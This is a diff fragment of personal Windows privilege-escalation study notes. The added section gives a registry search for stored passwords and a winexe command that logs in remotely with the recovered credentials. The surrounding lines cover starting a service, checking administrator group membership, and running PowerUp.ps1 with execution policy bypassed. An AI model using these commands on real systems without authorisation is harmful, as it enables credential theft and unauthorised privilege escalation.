ajith737/Notes/Privileage Escalation/Windows_PrivEsc.md

 8. `sc start refsvc`
 9. `net localgroup administrators` to confirm.

+### 15.4 Password in Registry
+`reg query HKLM /f password /t REG_SZ /s`  if we find any password we can login using `winexe -U 'admin%password' //MACHINE_IP cmd.exe`

 ## 16. Executable File running as a Service <a name="Executable_File_running_as_a_Service"></a>
 1.  `powershell -ep bypass`
 2. `. .\PowerUp.ps1`